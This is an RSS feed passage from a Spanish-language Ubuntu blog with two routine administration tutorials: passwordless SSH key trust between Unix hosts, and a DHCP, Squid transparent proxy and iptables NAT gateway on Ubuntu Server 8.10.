<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>vive-libre.com &#187; UBUNTU</title>
	<atom:link href="http://vive-libre.com/blog/category/ubuntu/feed/" rel="self" type="application/rss+xml" />
	<link>http://vive-libre.com/blog</link>
	<description></description>
	<lastBuildDate>Mon, 04 Jul 2011 03:13:00 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.2.1</generator>
		<item>
		<title>How to: Como Establecer una Relación de Confianza entre Servidores Unix</title>
		<link>http://vive-libre.com/blog/2011/07/04/how-to-como-establecer-una-relacion-de-confianza-entre-servidores-unix/</link>
		<comments>http://vive-libre.com/blog/2011/07/04/how-to-como-establecer-una-relacion-de-confianza-entre-servidores-unix/#comments</comments>
		<pubDate>Mon, 04 Jul 2011 03:13:00 +0000</pubDate>
		<dc:creator>Yovany</dc:creator>
				<category><![CDATA[UBUNTU]]></category>

		<guid isPermaLink="false">http://vive-libre.com/blog/?p=177</guid>
		<description><![CDATA[En pocas palabras, una relación de confianza nos permite acceder a un equipo remoto mediante ssh sin la necesidad de identificarnos dentro del equipo remoto de forma explicita. La utilidad de establecer una relación de confianza es muy variada no abarcaremos el tema de seguridad que implica ya que depende de la configuración y las ...]]></description>
			<content:encoded><![CDATA[<p>En pocas palabras, una relación de confianza nos permite acceder a un equipo remoto mediante ssh sin la necesidad de identificarnos dentro del equipo remoto de forma explicita.</p>
<p>La utilidad de establecer una relación de confianza es muy variada no abarcaremos el tema de seguridad que implica ya que depende de la configuración y las reglas de negocio de las plataformas y la forma en que se administran, pero en esencia es como darle las llaves de tu casa a una persona que sabes que es de <strong>confianza</strong> y como tal no necesita pedirte permiso para entrar.</p>
<p>Planteamos el siguiente escenario:</p>
<p>Tenemos dos equipo, el cliente que se autenticara en el host remoto mediante una relación de confianza.</p>
<p>Lo primero es generar un par de llaves, una publica y una privada mediante RSA, para ello ejecutaremos el siguiente comando en el equipo cliente:</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;"><span style="color: #c20cb9; font-weight: bold;">ssh-keygen</span> <span style="color: #660033;">-t</span> rsa</pre>
</div>
</div>
<p>La salida sera la siguiente, nos indicara que introduzcamos el nombre del archivo donde queremos se guarden las llaves, por defaul las generara en el directorio /home/yovany/.ssh con el nombre id_rsa</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;">Generating public<span style="color: #000000; font-weight: bold;">/</span>private rsa key pair.
Enter <span style="color: #c20cb9; font-weight: bold;">file</span> <span style="color: #000000; font-weight: bold;">in</span> <span style="color: #c20cb9; font-weight: bold;">which</span> to save the key <span style="color: #7a0874; font-weight: bold;">&#40;</span><span style="color: #000000; font-weight: bold;">/</span>home<span style="color: #000000; font-weight: bold;">/</span>yovany<span style="color: #000000; font-weight: bold;">/</span>.ssh<span style="color: #000000; font-weight: bold;">/</span>id_rsa<span style="color: #7a0874; font-weight: bold;">&#41;</span>:</pre>
</div>
</div>
<p>Dejamos vacío y presionamos enter.</p>
<p>Nos indicara que introduzcamos una clave, o presionemos enter para dejar vacío.</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;">Enter passphrase <span style="color: #7a0874; font-weight: bold;">&#40;</span>empty <span style="color: #000000; font-weight: bold;">for</span> no passphrase<span style="color: #7a0874; font-weight: bold;">&#41;</span>:</pre>
</div>
</div>
<p>Dejamos vacío y presionamos enter.</p>
<p>Nos indicara que introduzcamos la misma clave de nuevo.</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;">Enter same passphrase again:</pre>
</div>
</div>
<p>Dejamos vacío y presionamos enter.</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;">Your identification has been saved <span style="color: #000000; font-weight: bold;">in</span> <span style="color: #000000; font-weight: bold;">/</span>home<span style="color: #000000; font-weight: bold;">/</span>yovany<span style="color: #000000; font-weight: bold;">/</span>.ssh<span style="color: #000000; font-weight: bold;">/</span>id_rsa.
Your public key has been saved <span style="color: #000000; font-weight: bold;">in</span> <span style="color: #000000; font-weight: bold;">/</span>home<span style="color: #000000; font-weight: bold;">/</span>yovany<span style="color: #000000; font-weight: bold;">/</span>.ssh<span style="color: #000000; font-weight: bold;">/</span>id_rsa.pub.
The key fingerprint is:
03:<span style="color: #000000;">52</span>:<span style="color: #000000;">33</span>:<span style="color: #000000;">27</span>:<span style="color: #000000;">13</span>:<span style="color: #000000;">62</span>:a1:f8:c8:<span style="color: #000000;">76</span>:6d:c3:fe:<span style="color: #000000;">51</span>:bd:aa yovany<span style="color: #000000; font-weight: bold;">@</span>melchor</pre>
</div>
</div>
<p>En este momento ya tenemos generadas las llaves, que son las que otorgaremos al equipo remoto para identificarnos. </p>
<p>Lo siguiente es registrar las llaves publicas dentro del host remoto, para ello hay que copiar las llaves que generamos en /home/yovany/.ssh/id_rsa.pub</p>
<p>La llave pública se debe de copiar al equipo remoto  en la carpeta oculta .ssh del home del usuario con el que accederemos al equipo, (en nuestro caso el Home del usuario alan, ya sea mediante ftp ,samba,  usb o cual sea la forma en que compartamos archivos con el equipo remoto)</p>
<p>Nos ubicamos en el directorio en donde copiamos las llaves, en el equipo remoto.</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;"><span style="color: #000000; font-weight: bold;">/</span>home<span style="color: #000000; font-weight: bold;">/</span>alan<span style="color: #000000; font-weight: bold;">/</span>.ssh<span style="color: #000000; font-weight: bold;">/</span></pre>
</div>
</div>
<p>Agregamos las llaves públicas al archivo  authorized_keys, si el archivo no existe se generara</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;"><span style="color: #c20cb9; font-weight: bold;">cat</span> id_rsa.pub <span style="color: #000000; font-weight: bold;">&gt;&gt;</span> authorized_keys</pre>
</div>
</div>
<p>Y con esto estará disponible la relación de confianza.</p>
]]></content:encoded>
			<wfw:commentRss>http://vive-libre.com/blog/2011/07/04/how-to-como-establecer-una-relacion-de-confianza-entre-servidores-unix/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Configuracion de Ubuntu Server 8.10: DHCP + Squid + Iptables</title>
		<link>http://vive-libre.com/blog/2009/03/03/configuracion-de-ubuntu-server-810-dhcp-squid-iptables/</link>
		<comments>http://vive-libre.com/blog/2009/03/03/configuracion-de-ubuntu-server-810-dhcp-squid-iptables/#comments</comments>
		<pubDate>Tue, 03 Mar 2009 06:00:11 +0000</pubDate>
		<dc:creator>Yovany</dc:creator>
				<category><![CDATA[ALL]]></category>
		<category><![CDATA[MANUALES]]></category>
		<category><![CDATA[UBUNTU]]></category>

		<guid isPermaLink="false">http://vive-libre.com/blog/?p=4</guid>
		<description><![CDATA[Después de instalar un servidor con Ubuntu Server en este caso 8.10, lo que normalmente necesitamos es proveer de servicio de internet y con ello establecer ciertas reglas para controlar el acceso a ciertas paginas, para mantener fluido el trafico de nuestra red, el primer paso seria configurar el servidorDHCP, para asignar las ip automaticamente. Para ...]]></description>
			<content:encoded><![CDATA[<p>Después de instalar un servidor con Ubuntu Server en este caso 8.10, lo que normalmente necesitamos es proveer de servicio de internet y con ello establecer ciertas reglas para controlar el acceso a ciertas paginas, para mantener fluido el trafico de nuestra red, el primer paso seria configurar el servidorDHCP, para asignar las ip automaticamente.</p>
<p>Para este caso en particular tomaremos de referencia la sigiente informacion</p>
<p><a href="http://vive-libre.com/blog/wp-content/uploads/2011/05/red.jpg"><img class="size-medium wp-image-15 aligncenter" title="red" src="http://vive-libre.com/blog/wp-content/uploads/2011/05/red-300x198.jpg" alt="" width="300" height="198" /></a></p>
<p>Direccion de red interna:  192.168.2.0/24<br />
Interface con salida a internet: eth0<br />
Interface conectada a la red interna: eth1<br />
Ip de eth1: 192.168.2.1<br />
Ip de eth0: 192.168.1.100<br />
En este caso salimos a internet por medio de un modem 2wire de Telmex, aunque esto no importa demasiado, solo es para referencia.<br />
Lo primero que debemos da hacer es configurar las ip estaticas, como estamos usando una version de servidor asumimos que no tenemos interface grafica asi que nuestro editor de archivos sera VI , pero pueden usar el que mas les acomode.<br />
En vi hay dos modos de trabajo edicion y comandos, para edita un archivo hay que presionar la tecla [insert] para salir del modo de edicion y pasar a comandos presionamos la tecla [esc]  si queremos guardar el archivo entramos a modo de comandos y tecleamos :w si queremos salir es :q si queremos guardar y salir :wq para forzar cualquier accion agregamos el ! forzar el guardar :w! o forzar la salida :q!</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;"><span style="color: #c20cb9; font-weight: bold;">sudo</span> <span style="color: #c20cb9; font-weight: bold;">apt-get</span> <span style="color: #c20cb9; font-weight: bold;">install</span> <span style="color: #c20cb9; font-weight: bold;">vim</span></pre>
</div>
</div>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;"><span style="color: #c20cb9; font-weight: bold;">sudo</span> <span style="color: #c20cb9; font-weight: bold;">vi</span> <span style="color: #000000; font-weight: bold;">/</span>etc<span style="color: #000000; font-weight: bold;">/</span>network<span style="color: #000000; font-weight: bold;">/</span>interfaces</pre>
</div>
</div>
<p>Ahi pondremos esto</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;"><span style="color: #666666; font-style: italic;"># This file describes the network interfaces available on your system# and how to activate them. For more information, see interfaces(5).</span>
<span style="color: #666666; font-style: italic;"># The loopback network</span>
interface auto lo iface lo inet loopback
<span style="color: #666666; font-style: italic;"># The primary network interface</span>
auto eth0
iface eth0 inet static
address 192.168.1.100
netmask 255.255.255.0
network 192.168.1.0
broadcast 192.168.1.255
gateway 192.168.1.254
dns-nameservers 192.168.1.254
auto eth1
iface eth1 inet static
address 192.168.2.1
netmask 255.255.255.0</pre>
</div>
</div>
<p>Que significa esto?<br />
Esto nos inidica cual es la interface de loopback nada interesante</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;"><span style="color: #666666; font-style: italic;"># This file describes the network interfaces available on your system# and how to activate them. For more information, see interfaces(5).</span>
<span style="color: #666666; font-style: italic;"># The loopback network interface</span>
auto loiface lo inet loopback</pre>
</div>
</div>
<p>Se define la configuracion para eth0 que es la tarjeta que nos conectara a internet</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;"><span style="color: #666666; font-style: italic;"># The primary network interface</span></pre>
</div>
</div>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;">auto eth0</pre>
</div>
</div>
<p>Aqui indicamos que la direccion es de tipo estatico</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;">iface eth0 inet static</pre>
</div>
</div>
<p>La variable addres  es una ip del rango que nos asigna el modem para salir a internet</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;">address 192.168.1.100
netmask 255.255.255.0</pre>
</div>
</div>
<p>La red por defecto</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;">network 192.168.1.0
broadcast 192.168.1.255</pre>
</div>
</div>
<p>Es la puerta de enlace que nos da salida a internet</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;">gateway 192.168.1.254</pre>
</div>
</div>
<p>Y los DNS en este caso usamos el mismo modem para que nos resuelva hacia internet, esto datos cambian segun la configuracion de la red que les da salida a internet</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;">dns-nameservers 192.168.1.254</pre>
</div>
</div>
<p>Esta es la configuracion de la tarjeta de red a la que se conectara la red interna, solo hay que indicar la direccion IP y mascara, ya que nos conectaremos a internet por la otra tarjeta de red.</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;">auto eth1
iface eth1 inet static</pre>
</div>
</div>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;">address 192.168.2.1
netmask 255.255.255.0</pre>
</div>
</div>
<p>Para que cargue la nueva configuracion reiniciaremos los servicio de red</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;"><span style="color: #c20cb9; font-weight: bold;">sudo</span> <span style="color: #000000; font-weight: bold;">/</span>etc<span style="color: #000000; font-weight: bold;">/</span>init.d<span style="color: #000000; font-weight: bold;">/</span>networking restart</pre>
</div>
</div>
<p>Si todo esta bien configurado veremos algo como esto</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;"><span style="color: #000000; font-weight: bold;">*</span> Reconfiguring network interfaces...
<span style="color: #000000; font-weight: bold;">*</span> if-up.d<span style="color: #000000; font-weight: bold;">/</span>mountnfs<span style="color: #7a0874; font-weight: bold;">&#91;</span>eth0<span style="color: #7a0874; font-weight: bold;">&#93;</span>: waiting <span style="color: #000000; font-weight: bold;">for</span> interface eth1 before doing NFS mounts<span style="color: #7a0874; font-weight: bold;">&#91;</span> OK <span style="color: #7a0874; font-weight: bold;">&#93;</span></pre>
</div>
</div>
<p>El siguiente paso es configurar el DHCP, para asignar las direcciones ip de forma automatica, para esto usaremos dhcp3-server</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;"><span style="color: #c20cb9; font-weight: bold;">sudo</span> <span style="color: #c20cb9; font-weight: bold;">apt-get</span> <span style="color: #c20cb9; font-weight: bold;">install</span> dhcp3-server</pre>
</div>
</div>
<p>Primero hay que indicar en que interface de red es donde va a escuchar para eso editamos el siguiente archivo</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;"><span style="color: #c20cb9; font-weight: bold;">sudo</span> <span style="color: #c20cb9; font-weight: bold;">vi</span> <span style="color: #000000; font-weight: bold;">/</span>etc<span style="color: #000000; font-weight: bold;">/</span>default<span style="color: #000000; font-weight: bold;">/</span>dhcp3-server</pre>
</div>
</div>
<p>En nuestro caso la tarjeta que va a proveer el servicio es la eth1 que va a la red interna</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;"><span style="color: #666666; font-style: italic;"># Defaults for dhcp initscript# sourced by /etc/init.d/dhcp# installed at /etc/default/dhcp3-server by the maintainer scripts</span>
<span style="color: #666666; font-style: italic;">## This is a POSIX shell fragment#</span>
<span style="color: #666666; font-style: italic;"># On what interfaces should the DHCP server (dhcpd) serve DHCP requests?#       Separate multiple interfaces with spaces, e.g. &quot;eth0 eth1&quot;.INTERFACES=&quot;eth1&quot;</span></pre>
</div>
</div>
<p>Ahora hay que configurar el dhcp, en el siguiente archivo.</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;"><span style="color: #c20cb9; font-weight: bold;">sudo</span> <span style="color: #c20cb9; font-weight: bold;">vi</span> <span style="color: #000000; font-weight: bold;">/</span>etc<span style="color: #000000; font-weight: bold;">/</span>dhcp3<span style="color: #000000; font-weight: bold;">/</span>dhcpd.conf</pre>
</div>
</div>
<p>Tendremos un muy extenso archivo de configuracion de lo cual solo nos servira lo siguiente, lo demas lo podemos eliminar</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;">ddns-update-style interim;
authoritative;
subnet 192.168.2.0
netmask 255.255.255.0
range 192.168.2.100 192.168.2.200;
option domain-name-servers 192.168.1.254;
option routers 192.168.2.1;
option broadcast-address 192.168.2.255;
default-lease-time <span style="color: #000000;">36000</span>;
max-lease-time <span style="color: #000000;">180000</span>;</pre>
</div>
</div>
<p>Empezamos por definir sobre que red se va atrabajar y la mascara</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;">ddns-update-style interim;
authoritative;
subnet 192.168.2.0
netmask 255.255.255.0</pre>
</div>
</div>
<p>Indicamos el rando de direcciones que deseamos que asigne en este caso asiganras desdela ip 192.168.2.100 hasta la ip 192.168.2.200</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;">range 192.168.2.100 192.168.2.200;</pre>
</div>
</div>
<p>Indicamos los DNS</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;">option domain-name-servers 192.168.1.254;</pre>
</div>
</div>
<p>La puerta de enlace, en este caso el servidor ubuntu, ya que todas las maquinas de la red se conectaran a nosotros para proveerlos de internet.</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;">option routers 192.168.2.1;</pre>
</div>
</div>
<p>Estos son los valores que en dado caso se tendrian que modificar segun su configuracion de red. Solo quedaria reiniciar el servicio de DHCP</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;"><span style="color: #c20cb9; font-weight: bold;">sudo</span> <span style="color: #000000; font-weight: bold;">/</span>etc<span style="color: #000000; font-weight: bold;">/</span>init.d<span style="color: #000000; font-weight: bold;">/</span>dhcp3-server restart</pre>
</div>
</div>
<p>Si todo esta bien obtendremos esto</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;"><span style="color: #000000; font-weight: bold;">*</span> Stopping DHCP server dhcpd3                                           <span style="color: #7a0874; font-weight: bold;">&#91;</span> OK <span style="color: #7a0874; font-weight: bold;">&#93;</span><span style="color: #000000; font-weight: bold;">*</span> Starting DHCP server dhcpd3                                            <span style="color: #7a0874; font-weight: bold;">&#91;</span> OK <span style="color: #7a0874; font-weight: bold;">&#93;</span></pre>
</div>
</div>
<p>Ahora instalaremos el proxy, en este caso Squid</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;"><span style="color: #c20cb9; font-weight: bold;">sudo</span> <span style="color: #c20cb9; font-weight: bold;">apt-get</span> <span style="color: #c20cb9; font-weight: bold;">install</span> squid</pre>
</div>
</div>
<p>Es muy importante para poder compartir el internet tener activado al Froward, para esto crearemos un archivo que se ejecutara al inicio del arranque donde tambien se cargaran las iptables, ya que estas configuraciones, se pierden cada vez que se apaga el equipo, este archivo se llamara iptables.cf, o como gusten llamarle</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;"><span style="color: #c20cb9; font-weight: bold;">sudo</span> <span style="color: #c20cb9; font-weight: bold;">vi</span> <span style="color: #000000; font-weight: bold;">/</span>etc<span style="color: #000000; font-weight: bold;">/</span>init.d<span style="color: #000000; font-weight: bold;">/</span>iptables.cf</pre>
</div>
</div>
<p>Y pondremos lo siguiente</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;">iptables <span style="color: #660033;">-X</span>
iptables <span style="color: #660033;">-Z</span>
iptables <span style="color: #660033;">-t</span> nat <span style="color: #660033;">-F</span>
iptables <span style="color: #660033;">-P</span> INPUT ACCEPT
iptables <span style="color: #660033;">-P</span> OUTPUT ACCEPT
iptables <span style="color: #660033;">-P</span> FORWARD ACCEPT
iptables <span style="color: #660033;">-t</span> nat <span style="color: #660033;">-P</span> PREROUTING ACCEPT
iptables <span style="color: #660033;">-t</span> nat <span style="color: #660033;">-P</span> POSTROUTING ACCEPT
iptables <span style="color: #660033;">-t</span> nat <span style="color: #660033;">-A</span> POSTROUTING <span style="color: #660033;">-s</span> 192.168.2.0<span style="color: #000000; font-weight: bold;">/</span><span style="color: #000000;">24</span> <span style="color: #660033;">-o</span> eth0 <span style="color: #660033;">-j</span> MASQUERADE
iptables <span style="color: #660033;">-t</span> nat <span style="color: #660033;">-A</span> PREROUTING <span style="color: #660033;">-s</span> 192.168.2.0<span style="color: #000000; font-weight: bold;">/</span><span style="color: #000000;">24</span> <span style="color: #660033;">-d</span> <span style="color: #000000; font-weight: bold;">!</span> 192.168.2.0<span style="color: #000000; font-weight: bold;">/</span><span style="color: #000000;">24</span> <span style="color: #660033;">-p</span> tcp <span style="color: #660033;">--dport</span> <span style="color: #000000;">80</span> <span style="color: #660033;">-j</span> REDIRECT <span style="color: #660033;">--to-port</span> <span style="color: #000000;">3128</span>
iptables <span style="color: #660033;">-A</span> INPUT <span style="color: #660033;">-s</span> 192.168.2.0<span style="color: #000000; font-weight: bold;">/</span><span style="color: #000000;">24</span> <span style="color: #660033;">-i</span> eth1 <span style="color: #660033;">-j</span> ACCEPT
iptables <span style="color: #660033;">-A</span> FORWARD <span style="color: #660033;">-s</span> 192.168.2.0<span style="color: #000000; font-weight: bold;">/</span><span style="color: #000000;">24</span> <span style="color: #660033;">-i</span> eth1 <span style="color: #660033;">-p</span> tcp <span style="color: #660033;">--dport</span> <span style="color: #000000;">993</span> <span style="color: #660033;">-j</span> ACCEPTiptables <span style="color: #660033;">-A</span> FORWARD <span style="color: #660033;">-s</span> 192.168.2.0<span style="color: #000000; font-weight: bold;">/</span><span style="color: #000000;">24</span> <span style="color: #660033;">-i</span> eth1 <span style="color: #660033;">-p</span> tcp <span style="color: #660033;">--dport</span> <span style="color: #000000;">110</span> <span style="color: #660033;">-j</span> ACCEPTiptables <span style="color: #660033;">-A</span> FORWARD <span style="color: #660033;">-s</span> 192.168.2.0<span style="color: #000000; font-weight: bold;">/</span><span style="color: #000000;">24</span> <span style="color: #660033;">-i</span> eth1 <span style="color: #660033;">-p</span> tcp <span style="color: #660033;">--dport</span> <span style="color: #000000;">465</span> <span style="color: #660033;">-j</span> ACCEPTiptables <span style="color: #660033;">-A</span> FORWARD <span style="color: #660033;">-s</span> 192.168.2.0<span style="color: #000000; font-weight: bold;">/</span><span style="color: #000000;">24</span> <span style="color: #660033;">-i</span> eth1 <span style="color: #660033;">-p</span> tcp <span style="color: #660033;">--dport</span> <span style="color: #000000;">25</span> <span style="color: #660033;">-j</span> ACCEPTiptables <span style="color: #660033;">-A</span> FORWARD <span style="color: #660033;">-s</span> 192.168.2.0<span style="color: #000000; font-weight: bold;">/</span><span style="color: #000000;">24</span> <span style="color: #660033;">-i</span> eth1 <span style="color: #660033;">-p</span> tcp <span style="color: #660033;">--dport</span> <span style="color: #000000;">80</span> <span style="color: #660033;">-j</span> ACCEPTiptables <span style="color: #660033;">-A</span> FORWARD <span style="color: #660033;">-s</span> 192.168.2.0<span style="color: #000000; font-weight: bold;">/</span><span style="color: #000000;">24</span> <span style="color: #660033;">-i</span> eth1 <span style="color: #660033;">-p</span> tcp <span style="color: #660033;">--dport</span> <span style="color: #000000;">443</span> <span style="color: #660033;">-j</span> ACCEPT
iptables <span style="color: #660033;">-A</span> FORWARD <span style="color: #660033;">-s</span> 192.168.2.0<span style="color: #000000; font-weight: bold;">/</span><span style="color: #000000;">24</span> <span style="color: #660033;">-i</span> eth1 <span style="color: #660033;">-p</span> tcp <span style="color: #660033;">--dport</span> <span style="color: #000000;">53</span> <span style="color: #660033;">-j</span> ACCEPTiptables <span style="color: #660033;">-A</span> FORWARD <span style="color: #660033;">-s</span> 192.168.2.0<span style="color: #000000; font-weight: bold;">/</span><span style="color: #000000;">24</span> <span style="color: #660033;">-i</span> eth1 <span style="color: #660033;">-p</span> udp <span style="color: #660033;">--dport</span> <span style="color: #000000;">53</span> <span style="color: #660033;">-j</span> ACCEPT
<span style="color: #7a0874; font-weight: bold;">echo</span> <span style="color: #000000;">1</span> <span style="color: #000000; font-weight: bold;">&gt;</span> <span style="color: #000000; font-weight: bold;">/</span>proc<span style="color: #000000; font-weight: bold;">/</span>sys<span style="color: #000000; font-weight: bold;">/</span>net<span style="color: #000000; font-weight: bold;">/</span>ipv4<span style="color: #000000; font-weight: bold;">/</span>ip_forward</pre>
</div>
</div>
<p>Que es esto?<br />
Las iptables nos ayudaran a decidir que dejar pasar por la red y por donde dejarlo pasar, en este caso, solo configuraremos las iptables para que nos redireccionen todo el del puerto 80 hacia el puerto 3128 que es el puerto del squid, para que no tengamos que configurar el proxy en todas las maquinas <img src='http://vive-libre.com/blog/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> , y ya que compartimos el internet enmascaramos todo lo que venga de la red interna y que saldra por la interface eth0, permitiremos tambien el forward para el dhcp y tambien para el correo, para no tener problemas con los clientes de correo.<br />
Borramos las reglas que se esten ejecuntando</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;">iptables <span style="color: #660033;">-X</span>
iptables <span style="color: #660033;">-Z</span>
iptables <span style="color: #660033;">-t</span> nat <span style="color: #660033;">-F</span></pre>
</div>
</div>
<p>Aceptamos coneciones saliente, entrantes, el forward, prerouting y postrouting</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;">iptables <span style="color: #660033;">-P</span> INPUT ACCEPT
iptables <span style="color: #660033;">-P</span> OUTPUT ACCEPT
iptables <span style="color: #660033;">-P</span> FORWARD ACCEPT
iptables <span style="color: #660033;">-t</span> nat <span style="color: #660033;">-P</span> PREROUTING ACCEPT
iptables <span style="color: #660033;">-t</span> nat <span style="color: #660033;">-P</span> POSTROUTING ACCEPT</pre>
</div>
</div>
<p>Esta es una configuracion muy basica asi que por el momento no nos preocuparemos por el tema de la seguridad (eso es otro HowTo)<br />
Habilitamos el enmascaramiento, para que la red interna pueda salir a internet por la conexion del server</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;">iptables <span style="color: #660033;">-t</span> nat <span style="color: #660033;">-A</span> POSTROUTING <span style="color: #660033;">-s</span> 192.168.2.0<span style="color: #000000; font-weight: bold;">/</span><span style="color: #000000;">24</span> <span style="color: #660033;">-o</span> eth0 <span style="color: #660033;">-j</span> MASQUERADE</pre>
</div>
</div>
<p>Activamos el redireccionamiento para el proxy tranparente, tambien indicamos que lo redireccionaremos siempre y cuando el destino no sea una direccion dentro de la misma red, digase servidores web locales todo lo demas al proxy</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;">iptables <span style="color: #660033;">-t</span> nat <span style="color: #660033;">-A</span> PREROUTING <span style="color: #660033;">-s</span> 192.168.2.0<span style="color: #000000; font-weight: bold;">/</span><span style="color: #000000;">24</span> <span style="color: #660033;">-d</span> <span style="color: #000000; font-weight: bold;">!</span> 192.168.2.0<span style="color: #000000; font-weight: bold;">/</span><span style="color: #000000;">24</span> <span style="color: #660033;">-p</span> tcp <span style="color: #660033;">--dport</span> <span style="color: #000000;">80</span> <span style="color: #660033;">-j</span> REDIRECT <span style="color: #660033;">--to-port</span> <span style="color: #000000;">3128</span></pre>
</div>
</div>
<p>Habilitamos el forward para los puertos especificos de correo y dhcp,  pop,  imap, simap, smtp, ssmtp y dhcp</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;">iptables <span style="color: #660033;">-A</span> FORWARD <span style="color: #660033;">-s</span> 192.168.2.0<span style="color: #000000; font-weight: bold;">/</span><span style="color: #000000;">24</span> <span style="color: #660033;">-i</span> eth1 <span style="color: #660033;">-p</span> tcp <span style="color: #660033;">--dport</span> <span style="color: #000000;">993</span> <span style="color: #660033;">-j</span> ACCEPT
iptables <span style="color: #660033;">-A</span> FORWARD <span style="color: #660033;">-s</span> 192.168.2.0<span style="color: #000000; font-weight: bold;">/</span><span style="color: #000000;">24</span> <span style="color: #660033;">-i</span> eth1 <span style="color: #660033;">-p</span> tcp <span style="color: #660033;">--dport</span> <span style="color: #000000;">110</span> <span style="color: #660033;">-j</span> ACCEPT
iptables <span style="color: #660033;">-A</span> FORWARD <span style="color: #660033;">-s</span> 192.168.2.0<span style="color: #000000; font-weight: bold;">/</span><span style="color: #000000;">24</span> <span style="color: #660033;">-i</span> eth1 <span style="color: #660033;">-p</span> tcp <span style="color: #660033;">--dport</span> <span style="color: #000000;">465</span> <span style="color: #660033;">-j</span> ACCEPT
iptables <span style="color: #660033;">-A</span> FORWARD <span style="color: #660033;">-s</span> 192.168.2.0<span style="color: #000000; font-weight: bold;">/</span><span style="color: #000000;">24</span> <span style="color: #660033;">-i</span> eth1 <span style="color: #660033;">-p</span> tcp <span style="color: #660033;">--dport</span> <span style="color: #000000;">25</span> <span style="color: #660033;">-j</span> ACCEPT
iptables <span style="color: #660033;">-A</span> FORWARD <span style="color: #660033;">-s</span> 192.168.2.0<span style="color: #000000; font-weight: bold;">/</span><span style="color: #000000;">24</span> <span style="color: #660033;">-i</span> eth1 <span style="color: #660033;">-p</span> tcp <span style="color: #660033;">--dport</span> <span style="color: #000000;">80</span> <span style="color: #660033;">-j</span> ACCEPT
iptables <span style="color: #660033;">-A</span> FORWARD <span style="color: #660033;">-s</span> 192.168.2.0<span style="color: #000000; font-weight: bold;">/</span><span style="color: #000000;">24</span> <span style="color: #660033;">-i</span> eth1 <span style="color: #660033;">-p</span> tcp <span style="color: #660033;">--dport</span> <span style="color: #000000;">443</span> <span style="color: #660033;">-j</span> ACCEPT
iptables <span style="color: #660033;">-A</span> FORWARD <span style="color: #660033;">-s</span> 192.168.2.0<span style="color: #000000; font-weight: bold;">/</span><span style="color: #000000;">24</span> <span style="color: #660033;">-i</span> eth1 <span style="color: #660033;">-p</span> tcp <span style="color: #660033;">--dport</span> <span style="color: #000000;">53</span> <span style="color: #660033;">-j</span> ACCEPT
iptables <span style="color: #660033;">-A</span> FORWARD <span style="color: #660033;">-s</span> 192.168.2.0<span style="color: #000000; font-weight: bold;">/</span><span style="color: #000000;">24</span> <span style="color: #660033;">-i</span> eth1 <span style="color: #660033;">-p</span> udp <span style="color: #660033;">--dport</span> <span style="color: #000000;">53</span> <span style="color: #660033;">-j</span> ACCEPT</pre>
</div>
</div>
<p>Y por ultimo habilitamos el forward</p>
<div class="wp_syntax">
<div class="code">
